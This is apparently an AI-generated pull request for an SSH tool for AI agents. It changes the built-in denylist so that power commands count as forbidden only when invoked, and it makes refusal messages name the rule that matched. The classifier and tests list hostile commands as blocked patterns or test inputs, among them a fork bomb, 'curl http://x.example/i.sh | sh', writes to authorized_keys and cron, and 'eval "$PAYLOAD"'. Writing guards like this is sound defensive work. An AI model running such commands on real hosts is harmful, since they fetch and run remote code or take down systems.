### PR TITLE
fix(policy): match power commands by invocation, and say what a refusal refused

### DIFF
--- a/.changeset/curly-moons-repeat.md
+++ b/.changeset/curly-moons-repeat.md
@@ -1,0 +1,15 @@
+---
+"ssh-mcp": patch
+---
+
+Stop refusing read-only commands for mentioning a dangerous word, and say what a refusal actually refused ([#91](https://github.com/tufantunc/ssh-mcp/issues/91)).
+
+The never-allowed list matched `shutdown`, `reboot`, `halt`, `poweroff` and `eval` anywhere in the command string, so reading about one was refused as if it caused one. `last reboot`, `grep -r reboot /etc/`, `cat /var/run/reboot-required` and `journalctl | grep shutdown` were all denied. On a NAS, where an agent tends to check boot history early, this landed on the first command.
+
+These five now match an *invocation*: the head of each `;`/`&&`/`||`/`|`/newline-separated segment, looked at past any `sudo`/`doas`/`pkexec` prefix and its value-taking flags, with the directory part stripped. `sudo -u root reboot`, `/sbin/reboot`, `true && reboot` and `systemctl reboot` are still refused; `sudo grep reboot /var/log/syslog` is not. The check is a tokenizer rather than a regex, so it adds no backtracking to a path that is deliberately free of it.
+
+A knock-on fix: a command that merely mentions one of these words is no longer *classified* destructive either. `cat /var/run/reboot-required` comes back read-only, which is what it is.
+
+**Refusals now name what matched.** `Command matches denylist pattern` said nothing — not the rule, not its origin, not whether the reader could change it. A built-in refusal now names the rule and states that `[policy].denylist` adds patterns rather than removing these; an operator pattern is quoted back with the config key that carries it.
+
+**`APPROVAL_DENIED` no longer covers two different failures.** Approval fails closed, so a client that cannot be asked — no elicitation support, a transport failure, a malformed reply — denied the command with `User did not approve this command`, blaming the user for a prompt they never saw. That case is now `APPROVAL_UNAVAILABLE`, carrying the underlying error. The real decline keeps `APPROVAL_DENIED`. The diagnosis previously existed only on stderr, which for a stdio server is a client log file nobody reads.

--- a/src/guard/elicitation.ts
+++ b/src/guard/elicitation.ts
@@ -4,6 +4,13 @@ import type { PolicyEvaluation } from '../types.js';
 export interface ApprovalResult {
   approved: boolean;
   approver?: string;
+  /**
+   * Set when the client could not be asked at all, as opposed to being asked
+   * and saying no. Both deny the command; only one of them is the user's doing,
+   * and telling the reader they declined something they never saw sends them
+   * looking in the wrong place.
+   */
+  unavailable?: string;
 }
 
 /**
@@ -45,10 +52,20 @@ export async function requestApproval(
     }
     return { approved: false };
   } catch (err) {
+    const cause = err instanceof Error ? err.message : String(err);
+    // stderr still gets it for the operator's logs, but it cannot be the only
+    // copy: for a stdio MCP server that is a client log file nobody reads, so
+    // the caller gets the diagnosis too and can put it in front of the user.
     console.error(
       `Approval request failed for ${evaluation.commandClass} command on "${profileName}" — denying. ` +
-      `Does this client support elicitation? Cause: ${err instanceof Error ? err.message : String(err)}`,
+      `Does this client support elicitation? Cause: ${cause}`,
     );
-    return { approved: false };
+    return {
+      approved: false,
+      unavailable:
+        `this MCP client could not be asked to approve it. The likely cause is a client without ` +
+        `elicitation support; a transport failure or a malformed reply does the same. Approval fails ` +
+        `closed, so the command was refused rather than run. Underlying error: ${cause}`,
+    };
   }
 }

--- a/src/policy/classifier.ts
+++ b/src/policy/classifier.ts
@@ -64,14 +64,9 @@ const FORBIDDEN_PATTERNS: RegExp[] = [
   /mkfs\./,
   /dd\s.*\bof=\/dev\//,
   />\s*\/dev\/sd/,
-  /\bshutdown\b/,
-  /\breboot\b/,
-  /\bhalt\b/,
-  /\bpoweroff\b/,
   /:\(\)\s*\{\s*:\|:\&\s*\}\s*;\s*:/,   // fork bomb
   /curl\s[^|]*\|\s*(sh|bash|zsh)/,
   /wget\s[^|]*\|\s*(sh|bash|zsh)/,
-  /\beval\b/,
   />\s*\/etc\/cron/,
   />\s*\/etc\/systemd/,
   />\s*~\/.ssh\/authorized_keys/,
@@ -81,6 +76,115 @@ const FORBIDDEN_PATTERNS: RegExp[] = [
 ];
 
 /**
+ * Words that are forbidden when *invoked*, which the patterns above cannot
+ * express.
+ *
+ * These used to be `/\breboot\b/` and friends, matching the word anywhere in
+ * the string. `last reboot` reads a log and was refused for containing the
+ * word; so were `grep -r reboot /etc/`, `cat /var/run/reboot-required` and
+ * `journalctl | grep shutdown`. On a NAS an agent checking boot history trips
+ * this on its first command, which is how it was reported (#91).
+ *
+ * Matching an invocation rather than a mention needs to know where a command
+ * word can start, and that is a tokenizer's job, not a regex's — the regex
+ * forms that come close all reintroduce the `\S*` backtracking the block above
+ * exists to avoid.
+ */
+const FORBIDDEN_INVOCATIONS = new Set(['shutdown', 'reboot', 'halt', 'poweroff', 'eval']);
+
+/** Binaries that take the dangerous action as an argument: `systemctl reboot`. */
+const ACTION_MULTIPLEXERS = new Set(['systemctl', 'init', 'telinit']);
+
+const PRIVILEGE_PREFIXES = new Set(['sudo', 'su', 'doas', 'pkexec']);
+
+/**
+ * Privilege-prefix flags that consume the next argument, so `sudo -u root
+ * reboot` is not read as invoking `root`. Enumerable because it is one tool's
+ * option set, unlike "every flag of every binary".
+ */
+const PREFIX_VALUE_FLAGS = new Set([
+  '-u', '-g', '-p', '-C', '-h', '-r', '-t', '-U', '-c',
+  '--user', '--group', '--prompt', '--close-from', '--host', '--role', '--type',
+  '--other-user', '--command',
+]);
+
+/** `/sbin/reboot` and `reboot` are the same invocation. */
+function stripPath(word: string): string {
+  const slash = word.lastIndexOf('/');
+  return slash === -1 ? word : word.slice(slash + 1);
+}
+
+/**
+ * The command words a shell would actually execute — the head of every
+ * `;`/`&&`/`||`/`|`/newline-separated segment, past any privilege prefix, plus
+ * the arguments of a multiplexer like `systemctl`.
+ *
+ * Pure string work: split, trim, set lookups. No quantifiers, so nothing here
+ * can backtrack.
+ */
+function invokedWords(command: string): string[] {
+  const invoked: string[] = [];
+
+  for (const segment of command.split(/[;&|\n]/)) {
+    const words = segment.trim().split(/\s+/).filter(Boolean).map(stripPath);
+
+    let i = 0;
+    while (i < words.length && PRIVILEGE_PREFIXES.has(words[i])) {
+      i++;
+      while (i < words.length && words[i].startsWith('-')) {
+        const consumesValue = PREFIX_VALUE_FLAGS.has(words[i]);
+        i++;
+        if (consumesValue) i++;
+      }
+    }
+
+    const head = words[i];
+    if (!head) continue;
+    invoked.push(head);
+
+    // `systemctl reboot` restarts the host. Reading a unit that happens to be
+    // named after a power action is rare enough that erring towards refusal
+    // here costs little.
+    if (ACTION_MULTIPLEXERS.has(head)) {
+      invoked.push(...words.slice(i + 1).filter((w) => !w.startsWith('-')));
+    }
+  }
+
+  return invoked;
+}
+
+/** A forbidden rule, paired with wording a refusal can quote back. */
+interface ForbiddenRule {
+  label: string;
+  test: (command: string) => boolean;
+}
+
+const FORBIDDEN_RULES: ForbiddenRule[] = [
+  ...FORBIDDEN_PATTERNS.map((re) => ({ label: String(re), test: (c: string) => re.test(c) })),
+  {
+    label: 'invoking a power-state command (shutdown, reboot, halt, poweroff) or eval',
+    test: (command) => invokedWords(command).some((w) => FORBIDDEN_INVOCATIONS.has(w)),
+  },
+];
+
+/**
+ * Which never-allowed rule this command trips, or null. The single entry point:
+ * FORBIDDEN_PATTERNS is deliberately not exported, because half of the list
+ * lives in FORBIDDEN_RULES and a caller checking only the regexes would quietly
+ * permit `sudo reboot`.
+ */
+export function findForbiddenMatch(command: string): string | null {
+  for (const rule of FORBIDDEN_RULES) {
+    if (rule.test(command)) return rule.label;
+  }
+  return null;
+}
+
+export function isForbidden(command: string): boolean {
+  return findForbiddenMatch(command) !== null;
+}
+
+/**
  * Commands that are destructive but legitimate under approval — e.g.
  * `rm -rf /tmp/build`, which must NOT be confused with `rm -rf /`.
  */
@@ -88,8 +192,17 @@ const DESTRUCTIVE_PATTERNS: RegExp[] = [
   /rm\s+-rf?\s+\//,
 ];
 
-/** Everything that classifies as destructive: forbidden commands included. */
-const DESTRUCTIVE_DENYLIST: RegExp[] = [...FORBIDDEN_PATTERNS, ...DESTRUCTIVE_PATTERNS];
+/**
+ * Everything that classifies as destructive: forbidden commands included.
+ *
+ * Goes through isForbidden() rather than the regex list, so a command caught by
+ * an invocation rule is classified destructive too — and, just as importantly,
+ * reading a log that mentions `reboot` is no longer classified destructive
+ * either.
+ */
+function isDestructive(command: string): boolean {
+  return isForbidden(command) || DESTRUCTIVE_PATTERNS.some((re) => re.test(command));
+}
 
 const PRIVILEGED_INDICATORS = [
   /^\s*sudo\b/,
@@ -121,10 +234,8 @@ export function classifyCommand(command: string): ParsedCommand {
     return { binary, fullCommand, class: 'privileged' as CommandClass };
   }
 
-  for (const pattern of DESTRUCTIVE_DENYLIST) {
-    if (pattern.test(trimmed)) {
-      return { binary, fullCommand, class: 'destructive' as CommandClass };
-    }
+  if (isDestructive(trimmed)) {
+    return { binary, fullCommand, class: 'destructive' as CommandClass };
   }
 
   const twoWordPrefix = fullCommand.split(/\s+/).slice(0, 2).join(' ');
@@ -138,4 +249,4 @@ export function classifyCommand(command: string): ParsedCommand {
   return { binary, fullCommand, class: 'safe' as CommandClass };
 }
 
-export { READ_ONLY_ALLOWLIST, DESTRUCTIVE_DENYLIST, FORBIDDEN_PATTERNS };
+export { READ_ONLY_ALLOWLIST, isDestructive };

--- a/src/policy/engine.ts
+++ b/src/policy/engine.ts
@@ -5,7 +5,7 @@ import type {
   Profile,
   ApprovalMode,
 } from '../types.js';
-import { classifyCommand, FORBIDDEN_PATTERNS } from './classifier.js';
+import { classifyCommand, findForbiddenMatch } from './classifier.js';
 
 export interface PolicyRules {
   roleBindings: Record<string, Record<string, CommandClass[]>>;
@@ -207,14 +207,14 @@ export class PolicyEngine {
   private opaUrl: string | null = null;
   /** Rate-limits the fail-open warning so one outage can't flood stderr. */
   private lastOpaWarning = 0;
-  /** Canonical patterns plus the operator's, compiled once at construction. */
-  private readonly denyPatterns: RegExp[];
+  /** The operator's patterns, compiled once. The built-ins live in classifier.ts. */
+  private readonly userPatterns: RegExp[];
 
   constructor(private rules: PolicyRules = DEFAULT_RULES) {
     // Compile eagerly: a deny rule that silently degrades (the old code fell
     // back to substring-matching the command against the regex *source*) is
     // worse than a startup failure, because nothing surfaces the degradation.
-    const userPatterns = (rules.denylist ?? []).map((pattern) => {
+    this.userPatterns = (rules.denylist ?? []).map((pattern) => {
       try {
         return new RegExp(pattern);
       } catch (err) {
@@ -223,7 +223,6 @@ export class PolicyEngine {
         );
       }
     });
-    this.denyPatterns = [...FORBIDDEN_PATTERNS, ...userPatterns];
   }
 
   setOpaUrl(url: string | null): void {
@@ -239,13 +238,14 @@ export class PolicyEngine {
     const allowedClasses = this.getAllowedClasses(profile);
     const classAllowed = allowedClasses.includes(parsed.class);
 
-    if (this.matchesDenylist(command)) {
+    const denied = this.findDenyMatch(command);
+    if (denied) {
       return {
         decision: 'deny',
         commandClass: parsed.class,
         binary: parsed.binary,
         ruleId: 'denylist',
-        reason: 'Command matches denylist pattern',
+        reason: denied,
       };
     }
 
@@ -440,7 +440,30 @@ export class PolicyEngine {
     return needsApproval;
   }
 
-  private matchesDenylist(command: string): boolean {
-    return this.denyPatterns.some((pattern) => pattern.test(command));
+  /**
+   * Which deny rule refused this command, worded so the reader can act on it.
+   *
+   * The old message was `Command matches denylist pattern` and named nothing —
+   * not the rule, not where it came from, not whether the operator could change
+   * it. A user who hit it had no way to tell a built-in refusal from one they
+   * had written themselves (#91). explainRoleDenial already names the role, the
+   * group, the class and the allowed set; this path never got the same
+   * treatment.
+   */
+  private findDenyMatch(command: string): string | null {
+    const builtIn = findForbiddenMatch(command);
+    if (builtIn) {
+      return `Command matches a built-in never-allowed rule: ${builtIn}. ` +
+        `This list cannot be switched off — the [policy].denylist key adds patterns, it does not remove these.`;
+    }
+
+    for (const pattern of this.userPatterns) {
+      if (pattern.test(command)) {
+        return `Command matches /${pattern.source}/, a pattern from [policy].denylist in your config file. ` +
+          `Remove or narrow it there to allow this command.`;
+      }
+    }
+
+    return null;
   }
 }

--- a/src/tools/pipeline.ts
+++ b/src/tools/pipeline.ts
@@ -97,7 +97,15 @@ export function createPipeline({ server, registry, policy, audit, approvalGrantT
 
         const approval = await requestApproval(server, command, conn.profile.name, evaluation);
         if (!approval.approved) {
-          throw new PolicyRefusedError('APPROVAL_DENIED: User did not approve this command', evaluation);
+          // Two different failures used to share one message. "User did not
+          // approve" is true when the user declined and a lie when the client
+          // could not be asked, and the reader cannot tell which they got (#91).
+          throw new PolicyRefusedError(
+            approval.unavailable
+              ? `APPROVAL_UNAVAILABLE: ${approval.unavailable}`
+              : 'APPROVAL_DENIED: User did not approve this command',
+            evaluation,
+          );
         }
         grants.record(conn.profile.name, command, evaluation.commandClass);
         return { conn, evaluation, approver: approval.approver };

--- a/test/unit/guard/elicitation.test.ts
+++ b/test/unit/guard/elicitation.test.ts
@@ -66,6 +66,26 @@ describe('requestApproval', () => {
     expect(String(errorSpy.mock.calls[0][0])).toMatch(/Approval request failed/);
   });
 
+  /**
+   * The distinction the caller renders as APPROVAL_DENIED vs APPROVAL_UNAVAILABLE.
+   * Both deny; only one of them is the user's doing, and a reader told they
+   * declined a prompt they never saw goes looking in the wrong place (#91).
+   */
+  it('marks a failure to ask as unavailable, carrying the cause', async () => {
+    const server = makeMockServer('error');
+    const result = await requestApproval(server, 'rm /tmp/x', 'dev', mockEvaluation);
+    expect(result.unavailable).toMatch(/could not be asked/);
+    expect(result.unavailable).toMatch(/elicitation support/);
+    // The underlying error travels with it, so stderr is not the only copy.
+    expect(result.unavailable).toContain('Client does not support elicitation');
+  });
+
+  it.each(['decline', 'cancel'] as const)('leaves unavailable unset when the client answers (%s)', async (action) => {
+    const result = await requestApproval(makeMockServer(action), 'rm /tmp/x', 'dev', mockEvaluation);
+    expect(result.approved).toBe(false);
+    expect(result.unavailable).toBeUndefined();
+  });
+
   it('does not approve when the client accepts but confirm is false', async () => {
     const server = {
       server: { elicitInput: vi.fn().mockResolvedValue({ action: 'accept', content: { confirm: false } }) },

--- a/test/unit/policy/classifier.test.ts
+++ b/test/unit/policy/classifier.test.ts
@@ -1,5 +1,5 @@
 import { describe, it, expect } from 'vitest';
-import { classifyCommand, extractBinary, FORBIDDEN_PATTERNS } from '../../../src/policy/classifier.js';
+import { classifyCommand, extractBinary, isForbidden } from '../../../src/policy/classifier.js';
 
 describe('classifyCommand', () => {
   it('classifies allowlisted commands as read-only', () => {
@@ -124,7 +124,7 @@ describe('forbidden pattern matching cost', () => {
 });
 
 describe('forbidden patterns still match after the rewrite', () => {
-  const forbids = (command: string) => FORBIDDEN_PATTERNS.some((re) => re.test(command));
+  const forbids = (command: string) => isForbidden(command);
 
   it('refuses piping a download straight into a shell', () => {
     expect(forbids('curl http://x.example/i.sh | sh')).toBe(true);
@@ -151,5 +151,65 @@ describe('forbidden patterns still match after the rewrite', () => {
     expect(forbids('wget http://x.example/archive.tgz')).toBe(false);
     expect(forbids('dd if=/dev/zero of=/tmp/scratch bs=1M count=1')).toBe(false);
     expect(forbids('chown -R app:app /srv/app')).toBe(false);
+  });
+});
+
+/**
+ * Reported as #91: `/\breboot\b/` matched the word anywhere in the string, so
+ * reading a log that mentions a reboot was refused as if it caused one. The
+ * reporter hit it twice in a row on a NAS before getting anywhere.
+ *
+ * Both halves have to hold. Refusing a mention is the bug; missing an
+ * invocation would be much worse than the bug.
+ */
+describe('power-state commands: invocation versus mention', () => {
+  const forbids = (command: string) => isForbidden(command);
+
+  it('permits read-only commands that merely mention one', () => {
+    expect(forbids('last reboot')).toBe(false);
+    expect(forbids('grep -r reboot /etc/')).toBe(false);
+    expect(forbids('cat /var/run/reboot-required')).toBe(false);
+    expect(forbids('journalctl -u sshd | grep shutdown')).toBe(false);
+    expect(forbids('echo "do not reboot this host"')).toBe(false);
+    expect(forbids('ls /etc/systemd/system')).toBe(false);
+    expect(forbids('systemctl status sshd')).toBe(false);
+    // `sudo` in front of a mention is still only a mention.
+    expect(forbids('sudo grep reboot /var/log/syslog')).toBe(false);
+  });
+
+  it('still refuses actually invoking one', () => {
+    expect(forbids('reboot')).toBe(true);
+    expect(forbids('shutdown -h now')).toBe(true);
+    expect(forbids('poweroff')).toBe(true);
+    expect(forbids('halt')).toBe(true);
+    expect(forbids('sudo reboot')).toBe(true);
+    expect(forbids('/sbin/reboot')).toBe(true);
+    expect(forbids('sudo /sbin/shutdown -r now')).toBe(true);
+    expect(forbids('eval "$PAYLOAD"')).toBe(true);
+  });
+
+  it('refuses one hidden behind a separator or a privilege flag', () => {
+    expect(forbids('cd /tmp; reboot')).toBe(true);
+    expect(forbids('true && reboot')).toBe(true);
+    expect(forbids('echo x | reboot')).toBe(true);
+    // `-u root` consumes its value, so the head word is `reboot`, not `root`.
+    expect(forbids('sudo -u root reboot')).toBe(true);
+    expect(forbids('sudo -n poweroff')).toBe(true);
+  });
+
+  it('refuses a multiplexer carrying the action as an argument', () => {
+    expect(forbids('systemctl reboot')).toBe(true);
+    expect(forbids('sudo systemctl poweroff')).toBe(true);
+    expect(forbids('init 0')).toBe(false);        // a runlevel is not one of the words
+    expect(forbids('systemctl restart nginx')).toBe(false);
+  });
+
+  it('classifies a mention by what it actually is, not as destructive', () => {
+    // `last reboot` was reaching the denylist, so its class never mattered.
+    // It does now: this has to come back read-only, not destructive.
+    expect(classifyCommand('last reboot').class).not.toBe('destructive');
+    expect(classifyCommand('cat /var/run/reboot-required').class).toBe('read-only');
+    expect(classifyCommand('reboot').class).toBe('destructive');
+    expect(classifyCommand('sudo reboot').class).toBe('privileged');
   });
 });

--- a/test/unit/policy/engine.test.ts
+++ b/test/unit/policy/engine.test.ts
@@ -66,6 +66,34 @@ describe('PolicyEngine', () => {
     expect(result.ruleId).toBe('denylist');
   });
 
+  /**
+   * The refusal used to read `Command matches denylist pattern` and name
+   * nothing — not the rule, not where it came from, not whether the reader
+   * could change it. That is what the #91 reporter was left staring at.
+   */
+  describe('denylist refusals say what matched', () => {
+    const profile = makeProfile({ role: 'admin', name: 'dev', group: 'dev', approvalPolicy: 'auto' });
+
+    it('names the built-in rule and that it cannot be switched off', () => {
+      const result = engine.evaluate('reboot', profile, 'run-command');
+      expect(result.ruleId).toBe('denylist');
+      expect(result.reason).toMatch(/built-in/);
+      expect(result.reason).toMatch(/power-state/);
+      // The reader's next question is "can I turn this off?" — answer it.
+      expect(result.reason).toMatch(/does not remove these/);
+    });
+
+    it('quotes the operator pattern and points at the config file', () => {
+      const withDeny = new PolicyEngine({ ...DEFAULT_RULES, denylist: ['^terraform\\s+destroy'] });
+      const result = withDeny.evaluate('terraform destroy -auto-approve', profile, 'run-command');
+      expect(result.ruleId).toBe('denylist');
+      expect(result.reason).toContain('terraform');
+      expect(result.reason).toMatch(/\[policy\]\.denylist/);
+      // Distinguishable from a built-in: this one the operator can edit.
+      expect(result.reason).not.toMatch(/built-in/);
+    });
+  });
+
   it('readOnly profile only allows read-only', () => {
     const profile = makeProfile({ readOnly: true, name: 'prod-db' });
     expect(engine.evaluate('ls', profile, 'read-command').decision).toBe('allow');


### PR DESCRIPTION
Closes the follow-up on #91. The reporter's original problem — `sudo` refused by the role binding — was fixed by `--group`; their screenshots show that working and then landing on three other things.

## 1. The denylist refused mentions, not just invocations

`/\breboot\b/` and its four siblings tested the whole command string, so reading *about* a reboot was refused as if it caused one. Reproduced before touching anything:

```
deny  denylist  [destructive]  last reboot
deny  denylist  [destructive]  grep -r reboot /etc/
deny  denylist  [destructive]  journalctl -u sshd | grep shutdown
deny  denylist  [destructive]  cat /var/run/reboot-required
deny  denylist  [destructive]  echo "do not reboot this host"
```

`last reboot` reads a log. On a NAS this is roughly the first thing an agent runs, which is why the reporter hit it twice in a row.

**Now matched by invocation:** the head word of each `;`/`&&`/`||`/`|`/newline segment, read past any `sudo`/`doas`/`pkexec` prefix and the flags that consume a value, directory part stripped, plus a multiplexer's arguments so `systemctl reboot` is still caught.

Still refused — this is the half that matters more than the fix:

| | |
| --- | --- |
| `reboot`, `shutdown -h now`, `poweroff`, `halt` | ✅ refused |
| `sudo reboot`, `sudo -u root reboot`, `sudo -n poweroff` | ✅ refused |
| `/sbin/reboot`, `sudo /sbin/shutdown -r now` | ✅ refused |
| `cd /tmp; reboot`, `true && reboot`, `echo x \| reboot` | ✅ refused |
| `systemctl reboot`, `sudo systemctl poweroff` | ✅ refused |
| `eval "$PAYLOAD"` | ✅ refused |

A tokenizer rather than a regex on purpose: every regex form that gets close needs `\S*` for the path prefix, which reintroduces exactly the backtracking the comment above that block exists to prevent. Split, trim and set lookups cannot backtrack at all.

**Knock-on fix:** a mention is no longer *classified* destructive either. `cat /var/run/reboot-required` comes back `read-only`, which is what it is. Previously the denylist fired first so its class never mattered.

**`FORBIDDEN_PATTERNS` is no longer exported.** Half the rules now live outside it, and a caller checking only the regexes would quietly permit `sudo reboot`. `findForbiddenMatch` / `isForbidden` are the entry points, and the existing test helper was repointed at them.

## 2. Refusals named nothing

`Command matches denylist pattern` — not the rule, not where it came from, not whether the reader could change it. `explainRoleDenial` was given this treatment already (role, group, class, allowed set, whether the group was inferred); this path never was.

- built-in: names the rule, and answers the reader's next question — `[policy].denylist` **adds** patterns, it does not remove these
- operator's: quotes the pattern back and names the config key carrying it

## 3. `APPROVAL_DENIED` covered two different failures

Approval fails closed, correctly. But a client that *cannot be asked* — no elicitation support, transport failure, malformed reply — produced `APPROVAL_DENIED: User did not approve this command`, blaming the user for a prompt they never saw. From the outside a decline and an unanswerable request were identical; I could not tell which the reporter got, which is the defect.

Split into `APPROVAL_UNAVAILABLE`, carrying the underlying error, with `APPROVAL_DENIED` kept for a real decline. The diagnosis previously existed only on stderr — a client log file nobody reads, for a stdio server.

## Verification

Each fix mutation-tested **after** committing it, so the revert could not take the fix with it:

| mutation | fails |
| --- | --- |
| invocation check → substring match | the false-positive case + the classification case |
| built-in message → old wording | the built-in naming case |
| operator message → old wording | the config-pattern case |
| drop `unavailable` | the unavailable case |

Nothing else moves in any of the four.

- `npm run typecheck`, `npm run build` — clean
- 267 unit and property tests (10 new)
- `SSH_MCP_REQUIRE_SERVERS=1 npm run test:integration` — 122 passed, 6 skipped against live containers; the skips are `windows-compat.test.ts`, which needs `SSH_MCP_WIN_HOST`

Changeset included: `patch`. This changes behaviour of the published package — it narrows a denylist that was over-matching, and changes two error strings.

🤖 Generated with [Claude Code](https://claude.com/claude-code)